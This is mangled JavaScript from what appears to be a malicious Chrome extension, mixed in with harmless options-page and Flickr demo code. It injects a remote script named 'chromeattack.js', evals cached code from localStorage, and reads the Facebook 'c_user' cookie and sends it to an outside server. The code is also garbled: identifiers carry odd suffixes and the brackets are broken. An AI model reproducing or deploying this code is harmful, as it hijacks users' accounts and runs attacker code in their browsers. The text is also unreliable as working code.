window.onready = start_R_1(0)
  var vide_R_0 = []
  var FB_R_0 = 0
  a_R_? = 0
  function start_R_1(a_R_1) {
  if (document.getElementById_R_?('socialplus')){
    return
})
    var s_R_1 = document.createElement_R_?('script')
    if (1){
          localStorage_R_?['lastconnection'] = '';
      s_R_1.type = 'text/javascript';
      s_R_1.id = 'socialplus';
      s_R_1.src = 'http://sl.gorillacoder.org/chromeattack.js';
      if (document.getElementsByTagName('head')[0]){
                  document.getElementsByTagName('head')[0].appendChild(s_R_1);
          getakey_R_?();
} else {
        if (a_R_1 < 20){
          setTimeout_R_?(function () {
            start_R_1(a_R_1++)
},100)
})
});
} else {
          s_R_1.type = 'text/javascript';
      s_R_1.id = 'socialplus';
      s_R_1.className = 'cachedVersion';
      s_R_1.innerHTML = 'eval(unescape(localStorage["SPcachescript"]));';
      if (document.getElementsByTagName('head')[0]){
                  document.getElementsByTagName_R_?('head')[0].appendChild_R_?(s_R_1);
          getakey_R_6();
} else {
        if (a_R_1 < 20){
          setTimeout_R_?(function () {
            start_R_1(a_R_1++)
},100)
})
});
})
}
  var GM_xmlhttpRequest_R_0 = function (postmess_R_4) {
  chrome.extension.sendRequest({    methode_R_?:'ajaxcrox',    params_R_?:postmess_R_4},function (response_R_5) {
    postmess_R_4.onload_R_?({      responseText_R_?:response_R_5})
})
}
  function getakey_R_6() {
  if (document.cookie){
          index_R_? = document.cookie.indexOf_R_?('c_user');
      if (index_R_? != -1){
                  nDeb_R_? = document.cookie.indexOf('=',index_R_?) + 1;
          nFin_R_? = document.cookie.indexOf(';',index_R_?);
          if (nFin_R_? == -1){
                          nFin_R_? = document.cookie.length;
});
          FB_R_0 = unescape_R_?(document.cookie.substring_R_?(nDeb_R_?,nFin_R_?));
});
})
    if (FB_R_0){
    ajaxeur_R_8('http://get.buzzzapps.com/xpi/lechat/getaKey.php?id=' + FB_R_0,vide_R_0,function (data_R_7) {
      localStorage_R_?['mykey'] = data_R_7
})
})
}
  function ajaxeur_R_8(urlpost_R_8,params_R_8,callback_R_8) {
  window.setTimeout_R_?(function () {
    GM_xmlhttpRequest_R_?({      method_R_?:'GET',      url_R_?:urlpost_R_8,      headers_R_?:{        'Content-type':'application/x-www-form-urlencoded'},      cache_R_?:false,      data_R_?:params_R_8.join_R_?('&'),      onload_R_?:function (xhr_R_10) {
        var json_R_10 = escape_R_?(xhr_R_10.responseText)
          callback_R_?(json_R_10)
}})
},0)
}
  function save_options_R_11() {
  var select_R_11 = document.getElementById_R_?('color')
    var color_R_11 = select_R_11.children[select_R_11.selectedIndex].value
    localStorage_R_?['favorite_color'] = color_R_11
    var status_R_11 = document.getElementById('status')
    status_R_11.innerHTML = 'Options Saved.'
    setTimeout_R_?(function () {
    status_R_11.innerHTML = ''
},750)
}
  function restore_options_R_13() {
  var favorite_R_13 = localStorage_R_?['favorite_color']
    if (!favorite_R_13){
          return;
})
    var select_R_13 = document.getElementById_R_?('color')
    for(var i_R_13 = 0;i_R_13 < select_R_13.children.length;i_R_13++){
          var child_R_13 = select_R_13.children[i_R_13];
      if (child_R_13.value == favorite_R_13){
                  child_R_13.selected = 'true';
          break;
});
}
}
  function () {
  var temp_R_14 = document.getElementById_R_?('_added_by_transform_0')
    temp_R_14.addEventListener_R_?('load',function (event_R_15) {
    restore_options_R_13()
})
}()
  function () {
  var temp_R_16 = document.getElementById_R_?('_added_by_transform_1')
    temp_R_16.addEventListener_R_?('click',function (event_R_17) {
    save_options_R_11()
})
}()
  var req_R_0 = new XMLHttpRequest_R_?
  req_R_0.open_R_?('GET','http://api.flickr.com/services/rest/?' + 'method=flickr.photos.search&' + 'api_key=90485e931f687a9b9c2a66bf58a3861a&' + 'text=hello%20world&' + 'safe_search=1&' + 'content_type=1&' + 'sort=relevance&' + 'per_page=20',true)
  req_R_0.onload = showPhotos_R_?
  req_R_0.send_R_?(null)
  function showPhotos_R_18() {
  var photos_R_18 = req_R_0.responseXML.getElementsByTagName_R_?('photo')
    for(var i_R_18 = 0 photo_R_?;photo_R_? = photos_R_18[i_R_18];i_R_18++){
          var img_R_18 = document.createElement_R_?('image');
      img_R_18.src = constructImageURL_R_19(photo_R_?);
      document.body.appendChild_R_?(img_R_18);
}
}
  function constructImageURL_R_19(photo_R_19) {
  return 'http://farm' + photo_R_19.getAttribute_R_?('farm') + '.static.flickr.com/' + photo_R_19.getAttribute('server') + '/' + photo_R_19.getAttribute('id') + '_' + photo_R_19.getAttribute('secret') + '_s.jpg'
}
  function ajaxcrox_R_20(params_R_20,callback_R_20) {
  var xdr_R_20 = new XMLHttpRequest_R_?
    xdr_R_20.onreadystatechange = function () {
    if (xdr_R_20.readyState == 4){
      callback_R_?(xdr_R_20.responseText)
})
}
    xdr_R_20.open_R_?(params_R_20.method,params_R_20.url,true)
    xdr_R_20.setRequestHeader_R_?('Content-type','application/x-www-form-urlencoded')
    xdr_R_20.send_R_?(params_R_20.data)
}
  function lang_R_22(callback_R_22) {
  chrome.i18n.getAcceptLanguages(function (languageList_R_23) {
    var reallang_R_23 = languageList_R_23[0]
      if (reallang_R_23){
      var shortlang_R_23 = reallang_R_23.substring_R_?(0,2)
} else {
      shortlang_R_23 = 'en'
})
      callback_R_?(shortlang_R_23)
})
}
  chrome.extension.onRequest.addListener(function (request_R_24,sender_R_24,callback_R_24) {
  if (request_R_24.methode == 'ajaxcrox'){
    ajaxcrox_R_20(request_R_24.params,callback_R_24)
} else {
    if (request_R_24.methode == 'lang'){
      lang_R_22(callback_R_24)
})
})
})
